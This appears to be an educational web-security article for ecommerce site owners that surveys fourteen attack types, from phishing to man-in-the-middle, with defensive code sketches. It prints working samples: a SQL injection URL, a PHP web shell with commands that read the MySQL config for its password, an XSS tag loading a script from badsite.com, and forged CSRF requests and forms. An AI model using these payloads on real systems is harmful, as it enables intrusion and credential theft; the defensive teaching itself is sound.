Know Which Are the Common Forms of Cyber Security Attack to Create a Robust Defense Strategy & Protect Your Ecommerce Business
However, it’s equally important to understand the types of cyber attacks. It’s discomforting to learn about the threats, but until you understand which types of cyber attacks to watch out for, you won’t be able to create an effective strategy to defend against them.
To get the best ROI from the time and money you spend on securing your website against different types of cyberattacks, you should know about the attacks too. Some of the common forms of cyber security attack that everyone should be aware of are:
- Credential Stealing Phishing Attack
- Malware Based Phishing Attack
- Phone-based Phishing Attack
- SQL/Code Injection Attack
- Misconfigured Software
- Attacks Through Uploading Files
- XSS (Cross-Site Scripting) Attacks
- Password Attacks
- Cross-Site Request Forgery (CSRF)
- Outdated (Vulnerable) Software
- Accidental Exposure Of Sensitive Data
- DDoS (Distributed Denial Of Service) Attack
- DNS Spoofing
- Man-In-The-Middle Attack
Social Engineering – Attack Against People
It’s the first category of attack, also known as phishing or social engineering attack. Technically, it’s not an attack, but it dupes users in one way or another. For instance, a hacker may target a company by getting its employees to click a malicious link that asks them for login details.
Some of the different types of phishing attack are:
- Credential Stealing Phishing Attack
- Malware based Phishing Attack
- Phone-based Phishing Attack
Let’s look at these common types of phishing attacks one by one.
1. Credential Stealing Phishing Attack
It’s a growing phishing attack that’s quite popular among cybercriminals. As the name implies, cyber attackers use it to trick users into giving up their login credentials. It’s one of the most commonly used phishing attacks because it has no special requirements. It’s a cheap and extremely efficient approach to trick the victim.
How damaging this attack can be depends on human interaction. Usually, the victims are corporate employees’ accounts and an organization’s social media accounts, with attackers using sites like LinkedIn to search for a specific employee whose credentials give access to all other important accounts.
Here’s How Credential Stealing Phishing Attack Works
Credential stealing phishing attacks are used for many purposes and aren’t limited to gaining access to social media accounts. Cybercriminals also use this attack method to steal users’ bank details, employees’ tax IDs, gift cards, and much more.
Below are some basic steps that most cybercriminals follow in a credential-stealing phishing attack:
Identifying Victims: Attackers first research the company and try to figure out who has the most access, especially to the admin panel of your website, email addresses, and other critical accounts. If they can’t identify the right person, they may send an email to all the available email addresses and, based on that, try to figure out who has the most access.
Sending Malicious Phishing Email: Once they get their hands on an email address, they send an email to it that incites the reader to click on a link. Usually, that link goes to a fake login page that asks for login credentials. The email could be anything, for instance, a fake customer complaint or a service warning from a hosting provider.
Credential Harvesting: The email provokes you to log in to that fake login page. Once you do so, the hacker gains access to your login credentials, as the submitted login details go directly to the hacker’s server.
Log in Into an Account: Once they get their hands on the login details, they use them to log in to the website. Further, they can even use the “forgot password” feature to get into the website or other critical systems through that email address.
2. Malware Based Phishing Attack
It’s another common cyber attack where the main goal is to install malware on the victim’s system that can return the website’s login credentials or other data, such as the address book. Most of the time, attackers use email, the most common delivery vehicle, to execute these cyber attacks.
How Malware Based Phishing Attack Works
Scrutinizing Targeted Victims: Hackers select their targets by carefully researching and analyzing the organization and picking a few employees, or by sending malicious emails to everyone.
Sending Malicious Email: Once hackers select their targeted victims, they send a malicious email with malware hidden within a file, for example disguised as a job applicant’s resume, a file from the employer, or a customer’s purchase order.
Malware Installation: Once the victim opens the file attached to the email, the malware gets installed on their system. Depending upon the nature and type of malware, the attacker may get full control over the system.
Data Collection: Once the malware gets into the system, the hacker can do all types of nasty deeds, such as using a keylogger to capture passwords or other sensitive details, or pulling stored address books and stored passwords from your computer.
Accessing Systems: Finally, after getting the data they were after, they use those credentials to log in to your site and perform other attacks.
3. Phone-Based Phishing Attack
It’s quite similar to a phishing email, but somewhat different: here, the attacker uses SMS messages or voice calls. It usually needs more effort, so it’s a targeted attack on certain people, not everyone.
This attack is further divided into two categories: SMS phishing and voice phishing.
SMS Phishing
SMS phishing, also known as smishing, uses phone text messages to deliver fake SMS that encourage people to provide personal details.
One famous example of SMS phishing was noticed in 2018, when the Orange County SSA (Social Services Agency), California, had to warn residents about a text scam that tried to obtain card information from clients of CalFresh, CalWORKs, and General Relief.
Voice Phishing
Voice phishing, also called “vishing” (a combination of voice and phishing), is another criminal phone fraud that uses social engineering over the telephone system to gain access to sensitive information such as financial details.
One famous example of voice phishing was registered in Sweden, regarding the Mobile Bank ID app that identifies the user in internet banking. Many users of this app reported calls from fraudsters claiming to be bank officers, saying there was a security issue with the installed app and asking them to use their Mobile Bank ID app. A similar attack was reported on December 9, 2020, when alleged attackers started targeting older people in the New Ferry area, Wirral Peninsula, England, offering a COVID-19 vaccine.
Code-Based Attacks – Attacks Against Machines
Code-based attacks are another common form of cyber security attack, where code is written to break into websites. These types of cyber attacks are often shown in movies, where a geek kid gets full control of computer systems by typing a few lines of code. Hollywood greatly exaggerates how easy it is to perform, but that’s the basic idea.
Let’s get into the details of some of the most common cybersecurity attacks that use such code tricks, so you get an idea of how hackers use code vulnerabilities to get unauthorized access to a website.
Below are some of the commonly seen code-based attacks that you should be aware of:
- SQL/Code Injection Attack
- Misconfigured Software
- Attacks through Uploading Files
- XSS (Cross-Site Scripting) Attacks
- Password Attacks
- Cross-Site Request Forgery (CSRF)
- Outdated (Vulnerable) Software
- Accidental Exposure of Sensitive Data
- DDoS (Distributed Denial Of Service) Attack
- DNS Spoofing
- Man-In-The-Middle Attack
4. SQL/Code Injection Attack
SQL (Structured Query Language) injection and code injection are different types of cyber attacks that do the same thing: they send certain commands to a website to trick it into doing something it shouldn’t do.
For instance, SQL injection uses malicious SQL code to manipulate back-end databases and access information not normally displayed, such as the number of items and other sensitive company data, private customer details, or user lists.
Usually, SQL injection occurs when data enters a program through an untrusted source, or the data is used for dynamically constructing a SQL query.
Similarly, in code injection attacks, also known as RCE (Remote Code Execution), an attacker gets malicious code executed by the application. Here, the attacker’s capabilities depend upon the limits of the server-side interpreter, for instance, PHP or Python.
Let’s look at it with an example.
SQL Injection Attack Example
There are many types of SQL injection vulnerabilities, techniques, and attacks that arise in different situations. One commonly seen SQL injection attack is retrieving confidential data, where the SQL query is modified so that it returns additional results.
Let’s illustrate it.
For example, there’s a shopping portal that displays various products from different categories. Once the user clicks on the category called Clothes, the browser requests the URL below:
https://example-website.com/products?category=Clothes
It triggers an SQL query that retrieves the details of those products from the database.
SELECT * FROM products WHERE category = 'Clothes' AND released = 1
When the above query is executed, it asks the database for the following:
- Asterisk (*) – all details
- FROM – from the products table
- WHERE – where the category is Clothes
- AND – and released = 1
If no defense against SQL injection has been implemented, an attacker can send a request like:
https://example-website.com/products?category=Clothes'--
It results in the SQL query:
SELECT * FROM products WHERE category = 'Clothes'--' AND released = 1
The main difference here is the double dash. In SQL, it starts a comment, so the rest of the query is treated as a comment. This removes the remainder of the query, so released = 1 no longer applies, and the query displays all the products, including the unreleased ones.
5. Misconfigured Software
It’s another common form of cyber security attack, where the security controls of a server or web application haven’t been defined properly, or have been defined with errors. For instance, a database, software, or any CMS should be password protected to keep unauthorized users away.
Misconfiguration in security measures is a widespread issue, and it can happen at any level. According to the OWASP Top 10, this software misconfiguration is listed as number 6 on the list of essential web application security issues.
Without the right level of protection, security misconfigurations can open gates to new risks such as:
- Legacy applications that try to communicate with applications that don’t exist anymore. Attackers can take advantage of this and establish the connection.
- Administration ports that aren’t necessary but remain open for an application, which can result in remote attacks.
- Outbound connections to different internet services that can reveal unwanted behavior patterns of the application in a certain environment.
6. Attacks Through Uploading Files
The file upload function is a favorite target among hackers, as it allows your site to take a big chunk of data and write it to disk. The dark side is that it gives hackers a huge opportunity to transmit malicious code onto your website server.
As file upload functionality is becoming a critical part of any website, it has become a major problem within web-based applications. On most web servers, the impact of this file upload vulnerability depends on what the uploaded file is used for; it lets an attacker upload a file containing malicious code, which can later be executed on the server.
This file upload attack is becoming quite common against websites that let users upload files, for instance, contact form attachments, social media posts, profile photos, etc. If you’re thinking your site doesn’t have this feature and there’s no need to worry about it, then hold on. Most website platforms, including the one you’re using, contain code for supporting file upload features, such as code in a user profile or contact form.
One recent example of this flaw that made the headlines was found in August 2020: the WordPress quiz plugin named Quiz and Survey Master, installed and used on over 30K+ sites, was vulnerable to two critical flaws, including a file upload vulnerability that allowed attackers to take over the whole website. Another challenging exploit, found in December 2020, is that the plugin “Contact Form 7”, running on more than 5M+ WordPress websites, was open to this file upload attack.
Example of Attacks Through Uploading Files
Let’s illustrate a file upload attack with a real-world style example, so you can see why these types of cyber attacks are a favorite among cybercrooks:
- Bob is a hacker who recently signed up for a website that runs on a popular CMS (Content Management System).
- He created a profile and noticed that he could upload profile images using an image upload function.
- He notices a few other things: uploaded files don’t get renamed during the upload process, and the file name appears in the profile image URL once it’s published. Further, file-type verification is done using JavaScript.
- Bob writes a simple PHP script and saves it with the file name exploit.php. Whenever this web shell is executed by PHP, it runs whichever command is passed in the “cmd” parameter:
<?php
if (isset($_REQUEST['cmd'])) {
    $cmd = ($_REQUEST['cmd']);
    system($cmd);
} else {
    echo "Type command you want to pass";
}
?>
Web Shell Command that runs any passed command in the “cmd” parameter whenever it’s executed using PHP
- The hacker disables JavaScript in his web browser and uploads the exploit.php file he just created as his profile image. Because JavaScript is disabled, the file type is never verified.
- Unsurprisingly, the hacker’s profile image looks broken, as the uploaded file is not an image. But he gets what he wanted: the PHP script is now on the server.
- He goes to the “profile image” URL through the browser address bar, which executes the PHP script.
- Now, he can pass whichever command he wants in the “cmd” parameter, and it executes on the server. As a result, his uploaded PHP file has created a command execution vulnerability.
- Due to this, he can easily get access to sensitive data on the server. For example, by passing the locate my.cnf command, he can find the configuration file of a database.
example-website.com/1a2fe/exploit.php?cmd=locate+my.cnf
- Further, he can invoke the cat /etc/mysql/my.cnf command to read the file and find the database password.
example-website.com/1a2fe/exploit.php?cmd=cat+/etc/mysql/my.cnf
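The two gaps Bob relied on, a file-type check done only in browser JavaScript and uploads kept under their original names, can be closed on the server. The following is an added sketch, not code from the article or from any CMS; the function names, the size limit and the sample byte strings are assumptions made for this example.

```python
import os
import secrets

# Allowlist: extension -> byte signatures a real file of that type starts with.
ALLOWED_IMAGES = {
    ".png": (b"\x89PNG\r\n\x1a\n",),
    ".jpg": (b"\xff\xd8\xff",),
    ".jpeg": (b"\xff\xd8\xff",),
    ".gif": (b"GIF87a", b"GIF89a"),
}
MAX_BYTES = 2 * 1024 * 1024  # assumed size limit for a profile image


class UploadRejected(Exception):
    """Raised when an upload fails a server-side check."""


def stored_name_for(client_filename, data):
    """Validate an upload on the server; return the name to store it under."""
    # Only the last path component and only the LAST extension count, so
    # "exploit.png.php" is judged as .php.
    base = os.path.basename(client_filename.replace("\\", "/"))
    ext = os.path.splitext(base)[1].lower()
    if ext not in ALLOWED_IMAGES:
        raise UploadRejected("extension not allowed: %r" % ext)
    if len(data) > MAX_BYTES:
        raise UploadRejected("file too large")
    # The content must start with a signature of the claimed image type.
    if not data.startswith(ALLOWED_IMAGES[ext]):
        raise UploadRejected("content is not a %s image" % ext)
    # The client-supplied name is discarded: the stored name is random and
    # carries only the allowlisted extension.
    return secrets.token_hex(16) + ext


def is_accepted(client_filename, data):
    """True if the upload passes every server-side check."""
    try:
        stored_name_for(client_filename, data)
        return True
    except UploadRejected:
        return False


# Constructed sample uploads.
PHP_SCRIPT = b"<?php /* script content */ ?>"
PNG_IMAGE = b"\x89PNG\r\n\x1a\n" + b"\x00" * 32  # PNG signature plus filler

if __name__ == "__main__":
    for name, data in [("exploit.php", PHP_SCRIPT),
                       ("exploit.php.png", PHP_SCRIPT),
                       ("me.png", PNG_IMAGE)]:
        print(name, "->", "accepted" if is_accepted(name, data) else "rejected")
```

The signature check is a second layer only; the controls that stop the attack in the walkthrough are the server-side extension allowlist, the server-generated file name, and serving uploads from a location where the web server does not execute scripts.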
7. XSS (Cross-Site Scripting) Attacks
XSS, the abbreviation of Cross-Site Scripting, is a type of injection attack that injects malicious scripts, such as JavaScript, into your website. XSS attacks occur whenever an attacker uses a web application to send malicious code. It’s another common cyber security attack, and it enables attackers to inject client-side scripts into web pages opened by other users, instead of attacking the server side.
In other words, the main concept behind an XSS attack is to manipulate the client-side script of a web application so that it executes the way the hacker desires. For instance, through a cross-site scripting vulnerability, an attacker can bypass access controls like the same-origin policy. Another example is embedding a script into a page that executes whenever you load the web page or whenever the related event occurs.
Some big names have surfaced recently: in the third week of December 2020, network security appliance maker F5 found a series of vulnerabilities, including XSS (Cross-Site Scripting), in its BIG-IP products, which posed serious threats. Another case is from November 2020, when a bug bounty researcher found an XSS (Cross-Site Scripting) vulnerability in the popular video platform TikTok (though it’s patched) capable of taking over an account with one click.
Example of XSS (Cross-Site Scripting) Attack
Let’s illustrate how this cross-site scripting attack works with an example:
- For instance, there’s a blog, example-website.com, that lets site visitors comment on posts.
- A hacker visits the blog and leaves a comment that includes a reference to an external JavaScript file: <script src="http://badsite.com/hack.js"></script>
- This hack.js JavaScript file may contain malicious code that can harvest user logins, trigger malware downloads, secretly fetch the user’s browser cookies, etc.
- So, visitors of the blog example-website.com will be exposed to that malicious code while browsing the site.
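The comment from this example rendered two ways, as an added illustration that is not part of the original article: once concatenated into the page as markup and once with output escaping, with an HTML parser used to confirm whether a script element survives. The function names and the CSP header value are assumptions made for this example.

```python
import html
from html.parser import HTMLParser


def render_comment_unsafe(author, text):
    # Vulnerable: visitor input is concatenated into the page as markup.
    return '<div class="comment"><b>' + author + "</b>: " + text + "</div>"


def render_comment_escaped(author, text):
    # Hardened: <, >, & and quotes become entities, so the browser shows the
    # comment as text instead of parsing it as tags.
    return '<div class="comment"><b>%s</b>: %s</div>' % (
        html.escape(author), html.escape(text))


class ScriptFinder(HTMLParser):
    """Collects the src of every <script> element an HTML parser sees."""

    def __init__(self):
        super().__init__()
        self.sources = []

    def handle_starttag(self, tag, attrs):
        if tag == "script":
            self.sources.append(dict(attrs).get("src"))


def script_sources(page_html):
    """Return the src values of all script elements in the rendered HTML."""
    finder = ScriptFinder()
    finder.feed(page_html)
    finder.close()
    return finder.sources


# The comment from the example above.
COMMENT = 'Nice post! <script src="http://badsite.com/hack.js"></script>'

# Response header telling browsers to load scripts only from the blog's own
# origin; a second layer in case an unescaped value ever slips through.
CSP_HEADER = ("Content-Security-Policy", "script-src 'self'")

if __name__ == "__main__":
    print("unsafe :", script_sources(render_comment_unsafe("visitor", COMMENT)))
    print("escaped:", script_sources(render_comment_escaped("visitor", COMMENT)))
```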
8. Password Attacks
The login attack, also called a password attack, is another common cyber attack where hackers try to access your site by exploiting passwords. Login attacks like brute force attacks don’t require any type of special malicious code or software. All it takes is an attacker trying to crack your password using software that runs on the attacker’s system.
Such software uses different attack methods, like brute force, to guess passwords so that attackers can access accounts. Some common types of login attacks that you should know about for your website security are:
Brute Force Attack
A brute force attack is the most common form of cybersecurity attack, where hackers use a bot to randomly generate passwords and try logging in with them until they hit the correct one. This type of attack is usually helpful when there’s no possibility of taking advantage of other weaknesses in an encryption system.
Dictionary Attack
A dictionary attack breaks into user accounts by systematically entering words from a dictionary as the password. Attackers also use this type of attack to find the key that’s necessary to decrypt an encrypted message or document. Hackers often use bots to randomly generate passwords based on commonly used words from the dictionary. Sometimes, hackers even try common variations of words, such as Rainbow, RainBow, rainbow, etc.
Password Spraying
It’s another type of login attack similar to brute force, but it uses a few common passwords that many users use. Password spraying attacks let attackers access a large number of accounts using commonly used passwords.
Credential Stuffing
Credential stuffing is another common form of cyber security attack where attackers use already compromised user login details to access a system. Attackers often succeed because users frequently use the same password for multiple sites. If one account gets compromised, you may change the password for it but forget to change it for other accounts where you’re using similar passwords. For example, if you’re using mysunshine20!! on one site, it’s likely you’re using it somewhere else too.
- Massive databases of already breached credentials are broadly available in the hacker community.
- More advanced bots simultaneously try several logins and make them appear to come from different IP addresses.
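The login attacks above leave different traces in an authentication log: brute force and dictionary attacks pile failures onto one account, while password spraying spreads a few failures over many accounts from one source. The following added detection sketch is not from the original article; the thresholds, event format and sample events are constructed assumptions.

```python
from collections import defaultdict

WINDOW = 300           # seconds; assumed detection window
BRUTE_FAILS = 10       # failures against ONE account inside the window
SPRAY_ACCOUNTS = 5     # distinct accounts failed from ONE source in the window
SPRAY_PER_ACCOUNT = 2  # spraying tries only a few passwords per account


def _windows(items, window):
    """Yield each run of time-sorted items that fits inside `window` seconds."""
    items = sorted(items)
    start = 0
    for end in range(len(items)):
        while items[end][0] - items[start][0] > window:
            start += 1
        yield items[start:end + 1]


def detect(events):
    """events: iterable of (epoch_seconds, source_ip, username, success)."""
    fails_by_user = defaultdict(list)
    fails_by_ip = defaultdict(list)
    for ts, ip, user, ok in events:
        if not ok:
            fails_by_user[user].append((ts, ip))
            fails_by_ip[ip].append((ts, user))

    alerts = set()
    # Brute force / dictionary: many failures on one account, from any source.
    for user, fails in fails_by_user.items():
        if any(len(w) >= BRUTE_FAILS for w in _windows(fails, WINDOW)):
            alerts.add(("brute_force", user))
    # Password spraying: one source, many accounts, few tries per account.
    for ip, fails in fails_by_ip.items():
        for w in _windows(fails, WINDOW):
            per_user = defaultdict(int)
            for _, user in w:
                per_user[user] += 1
            if (len(per_user) >= SPRAY_ACCOUNTS
                    and max(per_user.values()) <= SPRAY_PER_ACCOUNT):
                alerts.add(("password_spraying", ip))
                break
    return sorted(alerts)


def sample_events():
    """Constructed login log for the demonstration."""
    events = []
    # Twelve failed guesses against one account within one minute.
    for i in range(12):
        events.append((i * 5, "203.0.113.10", "admin", False))
    # One failed guess each against six accounts from a single source.
    for i, user in enumerate(["alice", "bob", "carol", "dave", "erin", "frank"]):
        events.append((1000 + i * 10, "198.51.100.7", user, False))
    # An ordinary user mistyping once, then logging in.
    events.append((2000, "192.0.2.44", "grace", False))
    events.append((2010, "192.0.2.44", "grace", True))
    return events


if __name__ == "__main__":
    for kind, subject in detect(sample_events()):
        print(kind, subject)
```

Credential stuffing run through bots that rotate source addresses, as described in the last bullet, stays under both per-source and per-account thresholds, which is why it also calls for checks that do not depend on counting failures.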
9. Cross-Site Request Forgery (CSRF)
Cross-Site Request Forgery, abbreviated CSRF and also called XSRF, Session Riding or Sea Surf, is an attack where hackers launch attacks against website visitors instead of the website itself. In other words, it’s an attack where an attacker gets you to execute unwanted actions on a web application in which you’re currently authenticated. Using a little social engineering, for instance, sending a malicious link through email or chat, an attacker can trick you into executing actions chosen by them.
Example of CSRF Attack
Before attacking, hackers usually study the targeted web application to make malicious requests appear as legit as possible.
For instance, a usual GET request for transferring $1000 may look like:
GET http://yourbank.com/transfer.do?acct=Customer&amount=$1000 HTTP/1.1
A hacker can modify this request so that it transfers $1000 into their own account:
GET http://yourbank.com/transfer.do?acct=Hacker&amount=$1000 HTTP/1.1
Such a malicious request can easily be embedded into an ordinary-looking hyperlink:
<a href="http://yourbank.com/transfer.do?acct=Hacker&amount=$1000">Know more!</a>
After creating this link, hackers can easily distribute it through email to bank customers. If you click on this link while logged into your bank account, it’ll initiate the $1000 transfer without your intending it.
If the bank accepts only POST requests, it may become impossible for hackers to make the request through an <a> href tag. But they can try attacking through a <form> tag that is submitted automatically by embedded JavaScript. For example, the form may look like:
<body>
<form action="http://yourbank.com/transfer.do" method="POST">
<input type="hidden" name="acct" value="Hacker"/>
<input type="hidden" name="amount" value="$1000"/>
<input type="submit" value="View the message!"/>
</form>
</body>
- You’ve got an account on a banking website where, once logged in, you can submit a form to transfer funds by wire to another person’s account.
- Hackers may build a “malicious webpage” that includes a malicious script which fills in and submits the wire transfer form.
- You have to be logged in to your bank account for the form submission to work. So, hackers may dupe you into logging in, for example by sending an email disguised as coming from your actual bank.
- Once you’ve logged into your account and visit the malicious webpage built by the hacker, the web browser submits the form automatically, without any prior notification.
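The forged requests above work because the bank acts on any request that arrives with the victim's session. One common defence is a per-session token that only the bank's own form contains. This is an added sketch, not code from the article or from any bank; the handler, the status codes it returns and the session identifiers are assumptions made for this example.

```python
import hashlib
import hmac
import secrets

# Per-deployment secret, generated here for the demonstration.
SERVER_KEY = secrets.token_bytes(32)

# Session cookie attributes that also limit cross-site sending of the cookie.
SESSION_COOKIE_ATTRS = "Secure; HttpOnly; SameSite=Lax"


def issue_csrf_token(session_id):
    """Token the bank embeds as a hidden field in ITS OWN transfer form.

    It is derived from the session with a server-side key, so a page on
    another site cannot compute it or read it.
    """
    return hmac.new(SERVER_KEY, session_id.encode(), hashlib.sha256).hexdigest()


def handle_transfer(method, session_id, form):
    """Return an HTTP-style status code for a transfer request.

    `session_id` is what the browser's cookie supplies; the browser attaches
    it to forged requests too, which is why it cannot be the only check.
    """
    if method != "POST":
        return 405  # state-changing actions are never performed on GET
    expected = issue_csrf_token(session_id)
    supplied = form.get("csrf_token", "")
    # Constant-time comparison of the expected and supplied tokens.
    if not hmac.compare_digest(expected.encode(), supplied.encode()):
        return 403  # request did not come from the bank's own form
    return 200  # token matches this session: process the transfer


if __name__ == "__main__":
    sid = "constructed-session-id"
    forged = {"acct": "Hacker", "amount": "$1000"}  # fields of the forged form
    genuine = {"acct": "Customer", "amount": "$1000",
               "csrf_token": issue_csrf_token(sid)}
    print("forged GET  ->", handle_transfer("GET", sid, forged))
    print("forged POST ->", handle_transfer("POST", sid, forged))
    print("genuine POST->", handle_transfer("POST", sid, genuine))
```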
10. Outdated (Vulnerable) Software
Outdated or unpatched software is a common security threat you should be careful about. It’s among those common security threats through which hackers can do serious damage to your website and site visitors.
Innovations and software technology have a short life cycle and need ongoing updates and upgrades to keep your website running smoothly and safely while staying compatible with other software.
For instance, if you have a WordPress site and don’t update it once an update becomes available, you may be open to serious threats and vulnerabilities (which are removed in the updated version). Some of the attacks commonly seen on such outdated software versions are SQL injection, brute force, etc.
11. Accidental Exposure of Sensitive Data
You can’t exactly call it one of the common forms of cyber security attack, as it’s equivalent to keeping your jewelry outside your house and expecting to find it there after a month. As the name implies, once someone leaves sensitive data out in public, it becomes open to a data breach, and an attacker can gain unauthorized access to it.
Some of the most common accidental exposures of sensitive data that can lead to serious attacks are:
- Access to database tables through database software without requiring any password.
- Displaying very detailed error messages that contain sensitive information or data.
- Excel sheets containing customer data uploaded to the server that can be accessed through publicly available URLs.
- Publicly accessible log files containing sensitive data.
Some reported examples:
- Two different leaks came out through third-party companies, where 540+ million Facebook records were found exposed on AWS servers, as those companies had collected Facebook data on their servers. – Wired.com, April 3, 2019.
- More than 1 billion records were found exposed online, with data leaks of Facebook, LinkedIn, and Twitter profiles. – Wired.com, November 22, 2019.
- Data of 150K patients was found exposed due to a misconfigured AWS bucket. Here, Patient Home Monitoring failed to lock down public access to an online server, leading to the exposure of patient details. – HealthcareITNews.com, October 12, 2017.
12. DDoS (Distributed Denial of Service) Attack
A DDoS (Distributed Denial of Service) attack is another common form of cyberattack. Here, an attacker tries to make a server resource unavailable, temporarily or indefinitely disrupting the services hosted by your website.
It’s a cyber attack where an attacker tries to stop a service from being delivered. A DDoS attack can go after virtually anything, such as devices, services, networks, applications, servers, or even certain types of transactions within an application. In one recent DDoS attack that took the internet by storm, Cloudflare identified a new type of DDoS attack inspired by an acoustic beat.
There are three different types of DDoS attack:
- Volume-based attacks use a massive amount of fake traffic to overwhelm resources like servers or websites. They include UDP, ICMP, and spoofed-packet flooding attacks. The size of a volume-based attack is measured in bits per second (bps).
- Application-layer attacks are conducted by flooding applications with malicious requests. They are measured in requests per second (RPS).
- Protocol or network-layer DDoS attacks send many packets to the victim’s network infrastructure and infrastructure management tools. They include Smurf DDoS and SYN floods, and their size is measured in packets per second (PPS).
Here’s How This Cyber Attack DDoS Works
- First, the hacker compromises numerous websites, servers, and IoT devices.
- He installs a malware script on those hacked devices so that they execute commands given by him.
- The attacker selects a target and figures out the weak point of that website, for instance, a web page that makes a huge number of database calls.
- Once the target is identified, the attacker sends commands to all the compromised devices to send repeated requests to that website continuously.
- Once the targeted website gets overloaded, the server or application stops working, and ultimately it crashes or simply becomes unresponsive to real users.
13. DNS Spoofing
DNS spoofing, also called DNS cache poisoning, exploits vulnerabilities in DNS (Domain Name System) to divert internet traffic from legitimate servers to fake ones.
In other words, DNS cache poisoning means submitting false information into a DNS cache, so DNS queries return incorrect responses, and users land on the wrong websites.
Working of DNS Spoofing Attack
Let’s illustrate a DNS spoofing attack using an example where the client wants to connect to the website https://www.yourexamplesite.com/ and becomes the DNS spoofing victim.
- d1 – The client requests the IP address for the hostname yourexamplesite.com from the DNS server.
- d2 – The client gets a response to its request, but it doesn’t contain the legit IP address. Hence, a connection to the server of yourexamplesite.com is not established.
- h1 – After connecting to that fake IP address, the client’s request goes directly to the malicious host.
- h2 – In return, the malicious host answers the request with a fake website, which the client takes for the genuine one.
- A, B & C – Three different attack points for DNS spoofing: the client side, the network connection, and the DNS server.
14. Man-in-the-Middle Attack
A Man-in-the-Middle (MITM) attack is another common cyber attack method that has been in existence for a long time. In this cyberattack, the attacker comes between two parties communicating with each other, impersonates both of them, and gains access to all the information they are trying to send to each other.
In a MITM attack, an attacker can intercept, send, and receive data meant for someone else without the victim’s knowledge until it’s too late.
The goal of a MITM attack is to get access to critical information like login credentials, credit card numbers, account details, or any other sensitive information. It’s among the common types of cybersecurity attacks, faced mostly by users of financial applications, e-commerce websites, SaaS businesses, or any other site that requires you to enter your login details. It often occurs when proper security precautions are not in place. For instance, all Kubernetes versions were affected due to an unpatched MITM vulnerability.
Key Things About MITM Attack
- It’s a type of eavesdropping attack that happens when an attacker inserts themselves as a proxy into a communication session between systems and people.
- Once a MITM attack happens, it exploits real-time sessions such as financial transactions, transfers of sensitive data, or conversations.
Here’s How MITM Attack Works
A MITM attack usually takes place through the below-mentioned phases:
Intervention
- In this phase, an attacker first gains access to a network by manipulating DNS (Domain Name System) servers or through a poorly secured Wi-Fi router.
- Once they gain access, they scan the router for vulnerabilities and look for an entry point.
- The attacker tries to get in by breaking weak passwords or by using an advanced method such as cache poisoning or IP spoofing.
Decrypting Data
- After getting into the network, attackers steal critical data and decode it.
- Once the stolen data is decrypted, it’s leveraged for many malicious purposes such as identity theft, fraudulent bank activity, unauthorized purchases, etc.
Methods
Cyber crooks use a wide variety of methods to execute a MITM attack, and some common ones are:
- Impersonating an already established IP (Internet Protocol) address to dupe victims.
- Redirecting users from the original destination to a malicious website to access critical data like login credentials or other personal information.
- Stealing browser cookies that have personal information.
- Eavesdropping on your web activity.
Wrapping Up
These are some common types of cyber attacks that take place often. In this digital world, managing websites or using the internet daily is quite normal, but it’s equally important to stay aware of the risks that come along.
To create robust website security protocols and take proactive steps to keep yourself protected from the gangsters of the online world, you should be aware of the common forms of cyber security attacks mentioned here, so you can take better security measures to keep your website safe.